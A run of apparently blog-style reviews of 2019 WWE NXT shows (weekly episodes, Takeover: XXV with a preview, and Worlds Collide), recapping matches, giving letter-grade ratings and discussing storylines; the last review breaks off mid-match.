NXT – July 3, 2019: Very Pleased To Meet You Both Again

IMG Credit: WWE

Date: July 3, 2019
Location: Full Sail University, Winter Park, Florida
Commentators: Beth Phoenix, Nigel McGuinness, Mauro Ranallo

Things took a bit of a turn last week with Io Shirai turning full heel on Candice LeRae. That could make for some interesting changes as we head towards Toronto with that match being a potential TV main event between now and then. Other than that it’s time for more of the Breakout Tournament so let’s get to it.

Here are last week’s results if you need a recap.

Opening sequence.

Aaliyah vs. Mia Yim

Vanessa Borne is in Aaliyah’s corner. Aaliyah takes her down to start and yells a lot but misses an enziguri. Borne has to pull her out of the way of a rolling kick in the corner and Mia is in trouble again. A kick to the back and a knee drop (with a forward flip) keep Aaliyah down as the announcers drop Beatles lyrics.

Mia is right back with the Tarantula but walks into an enziguri. Something close to a surfboard has Mia in a different kind of trouble but she avoids another knee. Aaliyah gets sent into the corner for a Cannonball, followed by a toss to the floor for a double suicide dive. Back in and Protect Your Neck finishes Aaliyah at 4:52.

Rating: C-. Aaliyah still doesn’t look great most of the time but this was one of her better performances. What matters most is Yim heading straight for Shayna Baszler and the title in a match that I didn’t expect to be looking forward to. It seemed like Candice would be getting this spot but they’re making this work.

Post match Mia sends Borne into the steps and goes to commentary to say she’s coming to beat up Shayna Baszler. Oh and for the title too.

We look back at Shirai snapping last week and destroying Candice.

The Forgotten Sons storm into William Regal’s office and complain about their title shot. Regal says they got themselves disqualified so it’s to the back of the line with them. Threats are made but Regal has accepted the Street Profits’ idea for some challengers. Therefore, next week, Danny Burch and Oney Lorcan are getting a shot at the Profits.

We see Adam Cole going to Gargano’s Restaurant but the owner, Frank, doesn’t seem happy. Cole goes over to a wall of Johnny Gargano’s stuff and tacks up an autographed photo of himself. Cole gets his pizzas and leaves while pointing out the updated wall.

We cut to Cole bringing the pizzas to a wrestling school where Johnny recently spoke. Cole doesn’t think much of the students because Johnny lied to them. Johnny told them that they could achieve something but Cole can see that they’re not good enough. Cole brought them the pizzas because they need to take it home, sit on their couch and give up. Just accept that Johnny got lucky to win the NXT Title and give up already. Cole is an awesome jerk but I really don’t need to see him fight Gargano again.

Kushida vs. Jeff Parker

Kushida wrestles him to the mat without much effort to start and grabs a headlock. That goes nowhere so it’s time to work on the arm on the mat with an elbow going into Parker’s ribs. The threat of the Hoverboard Lock (now called the Sakuraba Lock) sends Parker over to the rope so Kushida kicks him in the arm. Now the Sakuraba Lock finishes Parker at 2:32.

Tyler Breeze doesn’t like the Undisputed Era taking credit for NXT’s success because this used to be NX-Breeze.

Killian Dain watches film.

Breakout Tournament First Round: Isaiah Scott vs. Cameron Grimes

That would be Shane Strickland vs. Trevor Lee. Scott says he’s confident and Grimes knows he’s the best in the world. They go technical to start with Grimes going for the arm as the fans know Scott’s signature chants. A quick trip to the floor goes nowhere so Scott comes back in with an armbar of his own. Grimes goes with some heavy forearms to escape so Scott cartwheels into a headscisccors to take over again.

The armbar goes on again but Grimes reverses into an armbar of his own. One heck of a clothesline drops Scott and it’s time to work on the arm a little more. Scott is back up with a hurricanrana out of the corner and a Downward Spiral gets two. The top rope stomp misses though and Grimes grabs a sitout powerbomb for his own two. Grimes gets sent outside and Scott nails a running flip dive. Back in and they trade strikes to the head until Grimes’ running flipping suplex takes Scott down. The standing double stomp finishes Scott at 8:32.

Rating: B. Grimes is the guy that I always heard great things about but never got the appeal. That changed here as these two had a heck of a match which made me want to see more of the tournament. Both guys looked like stars here and neither would have been hurt by the loss. Really good, action based match here and it worked.

Bianca Belair vs. Priscilla Zuniga

Belair shoves her in the face to start so Zuniga shoves her right back. That’s WAY too far for Belair, who takes off the earrings and takes Zuniga down for a beating. Some hair tosses set up shoulders in the corner and it’s a gorilla press, with squats. Two powerbombs into a reverse buckle bomb sets up the KOD to finish Zuniga at 2:13. This was ten miles ahead of everything Belair has done so far and showed off the crazy athleticism that the announcers kept talking about. She looked awesome here and had a fire she has never approached before.

Matt Riddle training video.

Tyler Breeze vs. Roderick Strong

Breeze works on the arm to start but Strong reverses into a headlock in a hurry. Back up and Breeze kicks him in the face but gets dropkicked right back down. They head outside with Breeze getting dropped back first onto the CORNER of the steps, followed by another backbreaker onto the barricade. Back in and Strong starts stomping at the back (makes sense) before grabbing something like a surfboard.

Breeze fights out of that as well and sends Strong outside for a running forearm from the apron. A Backstabber gives Breeze two back inside but Strong enziguris him on top. That means a superplex to bang up Breeze’s back even more but the Strong Hold is broken up. Most of the Supermodel Kick gives Breeze two and his own enziguri puts Strong down. Cue Kyle O’Reilly and Bobby Fish so Breeze kicks Fish down, only to walk into End of Heartache for the pin at 11:23.

Rating: B-. Another well done instance of having one person get a victory and the other being protected in a loss. This doesn’t hurt Breeze at all and Strong looks better at the same time. I could see Strong taking the North American Title at some point and they’re giving him some credibility to move in that direction so far. I would say keep it up, but would you expect anything else from NXT?

Overall Rating: B. This was a show built around the idea of advancing stories while also making the stars already there look good. You need these kind of shows without a big main event for a change and this one worked quite well. Some of the Takeover card is starting to come into shape and given the atmosphere, it could be another great one.


Mia Yim b. Aaliyah – Protect Your Neck

Kushida b. Jeff Parker – Sakuraba Lock

Cameron Grimes b. Isaiah Scott – Standing double stomp

Bianca Belair b. Priscilla Zuniga – KOD

Roderick Strong b. Tyler Breeze – End of Heartache

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s History Of In Your House (also available as an e-book) from Amazon. Check out the information here:


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NXT – June 19, 2019: It’s Pretty Undisputed

IMG Credit: WWE

Date: June 19, 2019
Location: Full Sail University, Winter Park, Florida
Commentators: Nigel McGuinness, Mauro Ranallo, Beth Phoenix

We’re back in Full Sail for the first real fallout show from Takeover and that means one thing: the Undisputed Era is going to get to have their big moment. Therefore, expect a lot of BAY-BAY’s and a tease of what is to come at Takeover: Toronto. I know it’s a pretty quick turnaround but the Summerslam show usually feels like their biggest of the year. Let’s get to it.

Here are last week’s results if you need a recap.

Opening sequence.

Here’s the Undisputed Era to open things up. Cole: “Told you so.” Cole talks about how he promised that this would be the Undisputed Era’s year and now, they’re going to start turning NXT into an Undisputed Image. Maybe this is how the show should start every week. We see a new opening sequence, featuring the Undisputed Era’s various highlights over the years, which the fans seem to like.

Kyle says he threw it together last night and Cole says that is why they run this place: they have all the power. Next up, it’s time to come after the Tag Team Titles so the Street Profits need to shine them up. Then they’ll have all the power and no one, not even HHH himself, will be able to touch them. Cue Velveteen Dream to say he’d like to touch Cole. NXT has risen to the heights it has reached because Dream Over. That NXT Title would look great next to the North American Title but Strong isn’t happy.

This brings out Matt Riddle, who says he beat Strong and Cole too. Riddle knows he’s an insanely good looking stallion but Cole calls him stupid for not realizing that he’s in the Undisputed Era. Now it’s Tyler Breeze interrupting to say he doesn’t care what is undisputed or who is better looking (Breeze: “Which, me by the way.”).

What he cares about is the Era trying to take credit for building NXT, which Breeze helped to do before the Era was even here. Therefore, it’s a six man tag with the three of them against any three members of the Era tonight. NXT doesn’t usually do these long form openings but it’s understandable given the big title change at Takeover. Cole deserved this kind of a platform and he already has three challengers set up. Just don’t make a habit of this.

Next week: Io Shirai vs. Shayna Baszler inside a cage.

Video on Baszler vs. Shirai, which has been going on for a good while now. Baszler beat Shirai at Takeover, sending Shirai over the edge (which apparently wasn’t a heel turn, despite having every trait of a heel turn).

Raul Mendoza vs. Damian Priest

That would be the former Punishment Martinez. Damian big boots him into the corner to start and drops Mendoza with a forearm. Another forearm to the back of the head rocks Mendoza, who annoys Priest with a shot tot he face. Damian ducks a springboard but gets caught with an enziguri. A rope walk dropkick sends Priest outside and he looks rather angry. Mendoza’s suicide dive is countered into a chokeslam onto the apron and a Roll of the Dice finishes Mendoza at 2:13. He’s going to need a better finisher but Priest looked good so far. Might have sold a bit too much though.

William Regal announces the Breakout Tournament between eight men who have never appeared on NXT TV before. The winner will receive a title shot against a champion of their choosing. The participants are:

Jordan Myles (ACH)


Cameron Grimes (Trevor Lee)

Isaiah “Swerve” Scott (Shane Strickland)

Dexter Lumis (Samuel Shaw)

Bronson Reed (Jonah Rock)

Angel Garza (Humberto Garza)

Joaquin Wilde (DJZ)

They actually list the indy names for a change. The tournament starts next week.

Video on Mia Yim, who grew up in Los Angeles during a lot of race riots. She was born to fight and wrestling was an escape. This is just the beginning and she’s coming for the Women’s Title. Just get a better nickname.

Taynara Conti vs. Xia Li

We go old school with the test of strength to start and Conti takes her down into a rollup for two. Conti gets in a few judo throws but has to avoid spinning kicks to the head. A kick to the leg puts Li down and lets Conti say that Latinas do it better. More kicks give Conti two and the kickouts get on her nerves. It’s off to a double arm crank until Li fights up and sweeps the leg (I would make a Karate Kid reference but I’ve never actually seen it). A kick to the head knocks Conti cold for the pin at 4:35.

Rating: D+. The match wasn’t anything great but it’s a good example of how to mix up the card. This was all about striking and throws while the previous match was a power display from Priest. Then you have the main event, which is going to be a mixture of styles. They’re throwing a bunch of different things out there instead of just doing the same stuff over and over again and it makes a difference.

The Street Profits are outside and ready to face the Forgotten Sons next week. The fans hold up their red cups.

Undisputed Era vs. Tyler Breeze/Matt Riddle/Velveteen Dream

It’s O’Reilly on the outside for this one and Riddle takes Cole down without too much trouble. The threat of a kneebar has Strong in to take Riddle into the corner and the stomping is on already. Riddle’s suplex gets two on Strong and it’s off to Dream for the first time. That means a hip swivel and a top rope ax handle to Fish, followed by a Lionsault (with knees to Fish’s face) for two.

It’s off to Breeze, who dropkicks Cole down without much trouble. Riddle comes back in, even though Dream wanted the tag. Cole misses the jumping enziguri and gets kneed in the face as everything breaks down. Riddle’s exploder sets up the Broton but Fish gets in a cheap shot. Strong hits the backbreaker on Riddle and it’s time for the chops in the corner. Cole’s knees to the back set up a chinlock but Riddle powers up in a hurry. A suplex is countered into a messy looking Backstabber for two on Riddle and it’s back to Strong.

The second chinlock doesn’t work as well and it’s Cole’s middle rope Canadian Destroyer getting kneed out of the air. Breeze comes in off the hot tag and it’s time for the strikes all around. The Beauty Shot hits Fish but Strong makes the save. Dream tags himself in but they manage a double superkick to put Cole on the floor. Strong knees Breeze into Dream though and it’s the End of Heartache to pin Dream at 9:16.

Rating: B. They set up a few things here as you could go with Riddle challenging Cole for the title, or possibly Strong coming after Dream, or even both. Throw in Dream and Breeze still having issues and that’s a potential rematch down the line. There’s something so nice about having all these options and NXT knows how to set them all up at once.

Overall Rating: B+. This was a storyline show with a good main event and that worked out quite well all things considered. NXT knows how to mix things up and give us something good throughout the show, which is exactly what they did here. Everything accomplished something and they have a bunch of directions to go, plus stuff to look forward to next week. As usual, NXT is the most efficient show around and that’s why it’s so easy to watch.


Damian Priest b. Raul Mendoza – Rolling cutter

Xia Li b. Taynara Conti – Spinning kick to the head

Undisputed Era b. Tyler Breeze/Velveteen Dream/Matt Riddle – End of Heartache to Dream

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s History Of In Your House (also available as an e-book) from Amazon. Check out the information here:


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Takeover: XXV – Can They Be Bad Just Once?

IMG Credit: WWE

Takeover: XXV
Date: June 1, 2019
Location: Webster Bank Arena, Bridgeport, Connecticut
Commentators: Beth Phoenix, Nigel McGuinness, Mauro Ranallo

We’re at the latest big show, even without as much time as it seems that we usually get for these things. The big story here is Johnny Gargano vs. Adam Cole in a rematch for the NXT Title after Cole defeated him in the first fall of a 2/3 falls match. The card doesn’t feel as strong as others but that’s never stopped them from having a great show before. Let’s get to it.

The opening video looks at the history of Takeover with some of the biggest moments the show has ever seen. There are certainly some great ones in there, plus a shot of all twenty five logos the show has ever had. We move into the regular video on the five matches tonight, including Cole vs. Gargano.

Roderick Strong vs. Matt Riddle

Riddle has been dealing with the entire Undisputed Era and it’s time to go after them one at a time. Strong can’t get anywhere on the mat to start and gets taken down with ease. The early Bromission attempt is broken up and it’s an early standoff. Some shoulders in the corner work better for Strong but Riddle is right back with some rolling gutwrench suplexes. Strong bails to the floor and gets forearmed off the steps for his efforts.

They forearm it out on the apron and Strong hits the first backbreaker to take over. A Rock Bottom backbreaker gets two and it’s time to go outside again with Riddle going ribs first into the post. Back in and some right hands give Strong two, followed by the Olympic Slam for the same. A very quick Bromission attempt is broken up so Riddle grabs a fisherman’s buster for a breather instead.

The rapid fire strikes give Riddle some more momentum and an exploder suplex makes it even better. The Broton into the running kick to the chest gets two and Riddle is spent. Some YES Kicks drop Strong again and a GTS into the German suplex gets two more. Strong enziguris him in the corner though and a top rope superplex gets a rather near fall. They slug it out again with Riddle’s back flaring up again, allowing Strong to tee off on him with a series of shots to the face.

The belly to back faceplant gets a VERY close two and Strong is stunned. The Stronghold is broken up and Riddle is back with a ripcord knee (the ripcord V Trigger according to Mauro) into a powerbomb. Riddle hits the Final Flash for two but Strong blocks a top rope twisting Broton with raised knees.

A tiger driver and a gutbuster get two and it’s straight into the Stronghold. That’s switched into a Liontamer but Riddle powers out of that as well, this time switching into the Bromission. The back gives out again though so Riddle elbows him in the face, setting up a reverse Neutralizer (the Bro Derrick, or at least that’s what it sounded like) to give Riddle the pin at 14:41.

Rating: A-. This was a match where you knew the end result but they managed to make me care about how we got there. Riddle survived a bunch in there and managed to win in the end, which was a good test for him. It’s clear that he’s (or Velveteen Dream) is going to get the rocket push soon enough and this was a great performance on the way there.

Shawn Michaels and Road Dogg are here.

We recap the Tag Team Titles, which were vacated by the Viking Raiders to head up to Raw (where they have been so well used). Therefore the titles are vacant and are hanging above the ring in a ladder match with four teams coming for them.

Tag Team Titles: Forgotten Sons vs. Oney Lorcan/Danny Burch vs. Street Profits vs. Undisputed Era

Ladder match for the vacant titles and there are no seconds. It’s a brawl to start as you had to see coming with the Era taking over early on. Blake gets low bridged to the floor and it’s time for a showdown with Lorcan and Burch. Lorcan chops away but Burch gets knocked down and the Era takes over again. It’s time for the first ladder but Blake suicide dives down to take the Era out. A bunch of people wind up brawling in front of the ring so Dawkins can dive onto all of them.

The Profits climb a ladder at the same time, allowing the Era to come back in for the save. Blake knocks the Era down again with O’Reilly landing back first on the ladder. The Sons put the ladder around their heads to clean house until Burch and Lorcan hit stereo release German suplexes, sending the ladder flying in a spot that could have gone a lot worse. The Profits are back in to take down Lorcan and Burch, with Ford hitting a heck of a frog splash.

O’Reilly is back in with a missile dropkick to break up a climb attempt but he bangs up his back even worse. It’s the Era loading up the ladder with Fish going up, only to have Blake toss powerbomb O’Reilly into the ladder for the huge crash, with Fish thankfully landing on O’Reilly. The big ladder is brought in and Cutler goes up….but stops to stomp onto Fish as Cutler hits a reverse DDT. There was absolutely nothing stopping him from getting the belts there.

Now the Sons go up again but Burch and Dawkins make the save with a Doomsday elbow/Doomsday Blockbuster each. O’Reilly starts going up but here’s Jaxson Ryker to buckle bomb him into a ladder. Ryker shoves Dawkins down and crushes him with a ladder in the corner over and over. Lorcan charges at Ryker and gets backdropped onto the edge of the ladder for a scary spot. Fans to Ryker: “WE DON’T LIKE YOU!”

Everyone gets together to beat down Ryker, who I don’t think got over as well as NXT would have liked him to here. About eight ladder shots to the back crush him for good and it’s back to “regularly scheduled hostilities.” Ryker is getting back up as the Era loads up a ladder so they hit him in the face with it instead. Ford adds a big running flip dive and it’s time for Burch and Lorcan to beat everyone up with the ladders.

They throw the ladder at the Forgotten Sons and go up the big ladder with the Era making the save. The four of them wind up on a pair of ladders but the Sons shove all of them over. The Profits come back in though with Dawkins spearing Cutler down and Ford springboarding onto the ladder to knock Blake off. Ford pulls down the titles at 21:19.

Rating: B. Ryker getting this much attention hurt things a bit as he almost had his own section in the middle of the match. What matters here though is they pulled the trigger on someone new and paid off their chase over the last few months. They were the right choice and they have a bunch of matches waiting on them, which is a great future.

Candice LeRae says she has Io Shirai’s back.

We recap Tyler Breeze vs. Velveteen Dream. Breeze has gone up to the main roster without the greatest success while Dream has taken over NXT. Now Breeze is back and wanting to reclaim his spot, but Dream says there is only room for one spotlight and it belongs to him. Breeze hit him with his phone and the match was set.

North American Title: Tyler Breeze vs. Velveteen Dream

Dream is defending and has some fans (as in the kind you wave in your face) for his entrance, which isn’t quite as big as I was expecting. He even throws a glove at Breeze and the fans are split to start. They fight over arm control to start and Dream bails from an early Unprettier attempt, allowing Breeze to lay on the ropes and wave a foot at Dream. A modified Backstabber gives Breeze one and he sends Dream to the floor.

The suicide dive hits forearm and it’s Dream coming back in with a double ax handle. Breeze is right back and wraps the knee around the post to take over. Dream punches him out of the air on the floor for a breather but the Dream Valley Driver is broken up. The half crab has Dream in more trouble and Breeze dropkicks him out to the floor. Breeze follows and eats a superkick, followed by some face first rams into the announcers’ table.

With Breeze down, Dream grabs a phone and the title, demanding that Breeze say cheese for a selfie. The distraction lets Breeze get in the Supermodel Kick but Dream snaps off a Dream Valley Driver. It’s too early for the Purple Rainmaker though as Breeze gets in an enziguri but Breeze’s high crossbody is rolled through for two. The DreamDT is blocked as well and Breeze’s second Supermodel Kick gets two more.

Dream blocks the Unprettier again and plants him with the DreamDT for another near fall. It’s time to go up again and this time Dream gets crotched but he’s fine enough for a hard knee to the face. They fight over a Tombstone of all things until Dream hits his own Unprettier for two.

The Purple Rainmaker hits raised knees (still don’t get how that doesn’t hurt the knee even more) and it’s the Supermodel Kick into the Unprettier to give Breeze his own crazy near fall. The Beauty Shot out of nowhere sends Dream outside and you can see the frustration setting in for Breeze. That’s nearly enough for the countout but Dream has the title, which is thrown to the referee. Now it’s the Dream Valley Driver into the Purple Rainmaker to retain at 16:47.

Rating: B+. That was teasing a heel turn at the end there but Dream didn’t actually cheat so we can chalk it up to mind games. Turning Dream isn’t going to work anyway as the fans just are not going to boo the guy so I don’t see the point. It’s another very good match and that’s all you would have expected from these two on this stage.

Post match they do take the selfie together and everything seems cool.

Damian Priest (Punishment Martinez) is coming.

We recap Io Shirai vs. Shayna Baszler. Shirai is the best talent from Japan and wants to prove that she can do it here too. Baszler says no one has been able to beat her and everyone who has tried has been run out of NXT.

Women’s Title: Io Shirai vs. Shayna Baszler

Baszler is defending. Shirai charges straight at her but gets taken down so Baszler can load up the arm stomp. That doesn’t quite work though and Shirai slaps her in the face. The champ gets sent outside and the baseball slide her has in trouble. Back in and the arm stomp works the second time around as Shirai is down for the first time.

Baszler starts in on the arm with stomps and pulling but Shirai gets in a German suplex for a breather. A 619 gives Shirai two more and she pulls Baszler down into a Crossface. That’s reversed into a side slam and they head up top with Shirai dropkicking him down to the floor. Shirai hits the big moonsault, followed by some running double knees back inside. Cue Jessamyn Duke and Marina Shafir but LeRae makes the save with the kendo stick.

The distraction lets Baszler get in a failed Kirifuda Clutch attempt as Shirai slips out in a hurry. Shirai’s moonsault misses but she backflips out of another Clutch for two. Shirai tries to bridge back into a cover but gets caught in the full Clutch. The hold stays on for a very long time until Shirai finally taps at 12:12.

Rating: B. Another rather good match here as Baszler cleans out a little more of the division. Candice is pretty much the only one left and that should be a rather good match. If nothing else the moment will work very well with the fans being rather pleased. Baszler staying in NXT as long as she can is the right call though as she is going to be buried horribly on the main roster.

Post match Shirai snaps and destroys Baszler with the kendo stick, plus hitting a moonsault while holding a chair. That almost has to be a heel turn after Shirai lost completely clean.

Stephanie McMahon is here.

We recap the main event. Cole beat Gargano in the first fall of a 2/3 falls match and has claimed that he deserves a rematch since. The Undisputed Era and Matt Riddle have been brought in since and this is the big rematch.

NXT Title: Johnny Gargano vs. Adam Cole

Cole is challenging and gets rapped to the ring. Gargano on the other hand has Captain Marvel inspired gear. Cole wastes no time in trying for the Last Shot but heads outside when Gargano glares at him. Back in and it’s time to fight over wrist control as the fans are split again. The Gargano Escape attempt earns Johnny a forearm to the face so he hurricanranas Cole to the floor.

The running flip dive from the apron has Cole down again and Gargano seems a bit stiff off the landing. Gargano starts in on the arm as the technical side continues. With the armbar broken up, Cole superkicks the leg to go after a limb of his own. Cole wraps the knee around the ropes and tries to bend it forward for a bit. Gargano comes back with a small package and a middle rope….something is countered into a powerbomb to give Gargano two.

There’s an overhead belly to belly and the rolling kick to Cole’s head makes it even worse. A middle rope Downward Spiral gets two and the slingshot spear gives Gargano the same. Gargano goes up and has to fight out of a sunset bomb, only to dive into a Backstabber for two more. The jumping enziguri rocks the champ and it’s a reverse fireman’s carry facebuster to bang up Johnny’s face again. Cole hits a superkick but dives into one from Gargano so they head to the floor for an exchange of superkicks and a double knockdown.

Cole gets back in first, allowing Gargano to hit the slingshot DDT for the very near fall. With Cole on the floor, Gargano wants the suicide dive but the leg is too hurt, allowing Cole to kick him in the head. The fireman’s carry backbreaker gets two more on Gargano and they’re both winded. Gargano throws him off the ropes so Cole lands on the bad arm, setting up the Gargano Escape. There is indeed an escape though and Cole gets in a Figure Four to go back to the leg.

Gargano gets smart by grabbing the arm to make Cole scream, setting up the turnover and the escape. That’s enough for Cole as he snaps and stomps away at the knee even more, setting up a JOHNNY DEFENSE chant. Johnny kicks away another Figure Four attempt and hits the slingshot DDT, which sends Cole to the floor again. The suicide dive is superkicked out of the air and a Canadian Destroyer off the apron knocks Gargano silly….for two. Cole tells Johnny that it’s over but the Last Shot misses.

Gargano can’t get the Gargano Escape as Cole reverses into one of his own, which is escaped as well. Now it’s Gargano hitting his own Last Shot for two, meaning we need a strike off. They trade even more superkicks until Gargano grabs a reverse hurricanrana. Cole pops up for the Last Shot and the very near fall so it’s time for a chair. Gargano doesn’t care and it’s a suicide dive….which hits the referee. With the referee down, Cole signals for someone from the back so Gargano grabs the chair, allowing Cole to hit a hanging piledriver for the next very near fall.

Gargano collapses to prevent the Last Shot from hitting again, which suckers Cole in for the Gargano Escape with Gargano crossing his legs to prevent Cole from hitting him. Cole rolls over and elbows the knee to get out though and some more kicks to the knee look to set up another Destroyer. Gargano sits down on it for two but Cole kicks him in the face again. Now the Destroyer into the Last Shot finishes Gargano at 31:47.

Rating: A-. I liked this one better than the previous match and the ending was the right call. Cole had to win the title at some point and beating Gargano clean here was the right way to go. Gargano is the kind of guy who can bounce back from a loss in a hurry and is better off as the guy who loses and has to fight back. This was rather great, though I was getting a little tired of the same moves over and over at the end.

The Undisputed Era comes in to celebrate (with Fish’s arm in a sling) to end the show.

Overall Rating: A. Just once, just once, I’d like to see NXT have a bad match (let alone a bad show) to see how the reaction went. The worst match they had here would have been one of the best matches on almost any other show, which just isn’t normal. It’s another great show with nothing even close to bad, though somehow it pales in comparison to how incredible New York was. Two title changes made it feel important though and Breeze being there tied it into the past. It’s worth seeing (of course) and now we can move on to Toronto with a proper build.

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s History Of In Your House (also available as an e-book) from Amazon. Check out the information here:


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NXT Takeover XXV Preview

IMG Credit: WWE

It might not feel like that much time has passed since the last Takeover special and really….it kind of hasn’t. We’re less than two months removed from Takeover: New York and therefore things are a bit rushed, mainly due to the Saudi Arabian show moving things up. The card looks rather good for the most part, but things aren’t feeling as exciting as they usually are. That’s never stopped them before though so hopefully everything goes well. Let’s get to it.

Matt Riddle vs. Roderick Strong

It’s pretty rare to have a Takeover match that is this obvious but that doesn’t mean it’s going to be boring. Riddle is one of the few people in wrestling that is close to an actual prodigy so it makes sense to feature him on these Takeover shows. Strong is no slouch though and it’s a good idea to have someone in there with this much experience to help make Riddle look great.

So yeah of course it’s going to be Riddle here, who is pretty clearly going to be challenging for the title at the next major Takeover. We’ll get to who he faces later, but this is going to be Riddle getting tested with a bunch of backbreakers and the Stronghold before making Strong tap while saying BRO a lot. That’s all it should be but they’ll give us a fun ride before we get to the obvious ending.

Women’s Title: Shayna Baszler(c) vs. Io Shirai

Aside from the main event, I try to go in order of how confident I am in order of the matches but with this show (as tends to be the case with Takeover) it’s just a random order because you could go with every option in almost any match. That’s the case here as Shirai seems ready to get the big win….but that would mean Baszler loses and that’s almost hard to imagine.

I’ll go with Shirai winning, though I’m scared of the idea of Baszler going up to the main roster. That’s been such a plague as of late (by that I mean years) and Baszler is someone they could screw up in a hurry. Shirai could be the face of the division, though I’m not sure I can imagine Baszler losing. She has to at some point though and I’ll go with Shirai taking the title.

Tag Team Titles: Undisputed Era vs. Oney Lorcan/Danny Burch vs. Street Profits vs. Forgotten Sons

The titles are vacant coming in and this is a ladder match as the Viking Raiders vacated the belts to move up to the main roster. You know, because THAT has gone so well (hence my fear about Baszler) and they couldn’t be put in here and lose the titles before moving up. Anyway, this is really a battle between two teams, though you can never guarantee what is going on.

There are two main options here but I’ll go with them making the smart choice and going with the Street Profits. The fans want to see them getting the titles and they gave the Viking Raiders a run for their money, though NXT certainly likes the Forgotten Sons as well. Lorcan and Burch and the Era feel like they’re there to add in more bodies, even if the Era winning isn’t out of the question. I’ll take the Profits, though the Sons are a strong option as well.

North American Title: Velveteen Dream(c) vs. Tyler Breeze

The battle of the entrances alone is going to be amazing. This is a heck of a story between the only two people who could really pull it off, but what makes this work so well is that I’m not sure who is going to win. Breeze could be back in NXT full time and he has never won the big one, but Dream seems ready to be the biggest breakout star in forever and having him lose here wouldn’t be the best idea in the world.

The more I think about it though, the more I think it makes sense to keep the title on Dream. He has everything you could want in a star but I’m completely terrified of WWE trying to “fix” him. This has the show stealing potential as Breeze is going to want to use his opportunity to get noticed and Dream is Dream. I’m looking forward to this though and it should be awesome.

NXT Title: Johnny Gargano(c) vs. Adam Cole

This is a rematch from April at Takeover: New York where Gargano won the title in a pretty polarizing 2/3 falls match. Cole won the first fall and got the rematch though, which makes quite a bit of sense. That’s also been his big sticking point in the promos leading up to it and that’s about all he can talk about it coming in as well. There’s going to be some screwiness in the match with all the people involved on the floor (Riddle is all but guaranteed to be involved) and this one depends on where things are going from here.

I’ll take Cole to win the title, though it’s another match where I have next to no confidence in the pick. Cole has been chasing the title for a long time now and at some point he needs to win the thing. Either way, I can’t imagine anyone but Riddle walking out of Toronto as champion so the winner is just keeping the title warm until then. I’m looking forward to the match, and it could be better than the previous version.

Overall Thoughts

This should be a blast for the most part, though coming off an all time show like Takeover: New York, there are only so many things they can do. The show feels like it’s being added into the calendar because it has to be, but I’ve long since had enough faith in NXT to make anything work. I’m sure it’s going to be awesome, and that’s still leaving it so much higher than anything else at the moment that it’s hard to truly be worried.



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Worlds Collide: NXT vs. NXT Alumni: As Long As WWE Doesn’t Hear About It

IMG Credit: WWE

Worlds Collide: NXT vs. NXT Alumni
Date: April 14, 2019
Location: Pier 12, New York City, New York
Commentators: Byron Saxton, Percy Watson

So you might remember the When Worlds Collide tournament from over Royal Rumble weekend. Well now they’re doing a series of one off shows with nothing on the line, though this time around we have some interesting concepts, such as this one with a pretty simple name. This could be entertaining or it could be rather boring so let’s get to it.

The announcers run down most of the card.

Kassius Ohno vs. Aiden English

Yes English does still wrestle. The fans given Aiden an AIDEN DAY chant and Ohno congratulates him for getting a chant while being a commentator. That’s too much for Aiden, who hammers away with right hands in the corner and a running elbow makes it worse. Ohno shoves him off the top to the floor though and follows Aiden outside for a right hand (Ohno: “OHNO DAY!”).

Back in and we hit the chinlock until Ohno switches to a double arm crank. Aiden fights up and reverses a neckbreaker into a falling DDT for two. The big running flip dive to the floor (When did Aiden learn to do that?) knocks Ohno down again and a backsplash gets two more back inside. Ohno isn’t having any more of this and kicks Aiden in the face, setting up the Roaring elbow to the back of the head for the pin at 5:57.

Rating: C-. Ohno’s shouting insults were a very nice addition here and they helped what was an otherwise dull match. There’s only so much you can get out of Ohno vs. English as Ohno is a role player and English hasn’t had much success outside of his Vaudevillain days in NXT. Not terrible, but the ending coming out of nowhere didn’t help things.

Harper vs. Dominik Dijakovic

This is Harper’s big return after his wrist injury. The fans welcome him back and it’s Harper going straight at him for a lockup in the corner. After the clean break, they trade shots to the face with Harper’s knocking Dijakovic outside. Back in and Dijakovic blocks a suplex attempt and nails the suplex toss in a great power display. More of the same gives Dijakovic two but Harper is right back with a DDT to put them both down.

A heck of a right hand lets Harper hit a slingshot hilo and a big boot gets two. The swinging Boss Man Slam gets the same but Harper goes up and gets chokeslammed back down. They slug it out on the apron and it’s Harper neckbreakering him out to the floor in a crash. Back in and a half nelson suplex drops Dijakovic on his neck again but it’s too early for the discus lariat. Dijakovic shouts DIE so Harper superkicks him, only to get kicked right back in the face to give Dijakovic two.

Rating: B. And that’s pretty much it for Harper, who asked for his release a few days later. At least he went out on a very good match between two big monsters, with both guys trading bombs until one of them couldn’t get up. I had a good time with this one and that’s all you can ask for from a hoss fight like this.

Post match respect is shown in a nice touch.

Sanity vs. Undisputed Era

Alexander Wolfe/Killian Dain (with Eric Young) vs. Kyle O’Reilly/Bobby Fish here. Fish and Wolfe start things off with Kyle going to his back and Wolfe waving down at him. A hiptoss lets Wolfe wave again and the threat of wild swinging sends O’Reilly bailing to the floor. Back in and Wolfe spins around and has a seat on the mat, freaking O’Reilly out enough that he bails over for a tag.

O’Reilly is sent outside and it’s Dain coming in to clean house. The Samoan drop/fall away slam combination is as impressive as ever and a backsplash into the Vader Bomb gets two on O’Reilly. Fish’s exploder gets two on Wolfe with Dain making the save. The Backstabber into the backsplash from Dain crushes Fish for two but O’Reilly comes in off a blind tag and chop blocks Dain. High/Low finishes Dain at 9:07.

Rating: C+. This didn’t have anywhere near the heat you might have expected, though can you blame Sanity for not being all fired up here? They’re almost on the same level as the Colons at this point and I don’t see that getting any better. The match was entertaining enough though because of the talent in there, but not exactly must see.

Post match the Era goes after Dain again so Young comes in for the save.

Tyler Breeze vs. Roderick Strong

Feeling out process to start with Strong going to a wristlock. Breeze spins out and puts on a wristlock of his own before snapping off a dropkick to send Strong into the corner. A catapult makes it even worse for Strong but he’s fine enough to knock Breeze off the top and out to the floor.

Back in and we hit the first backbreaker (you knew those were coming), setting up Strong putting his knee in Breeze’s ribs and pulling on the neck. Strong’s dropkick gets two and he mocks Breeze’s picture taking abilities. It’s off to another backbreaker, this time with Strong keeping Breeze over his knee. The chinlock with a knee in the back stays on the designated target before Strong mixes things up with a modified Gory Stretch.

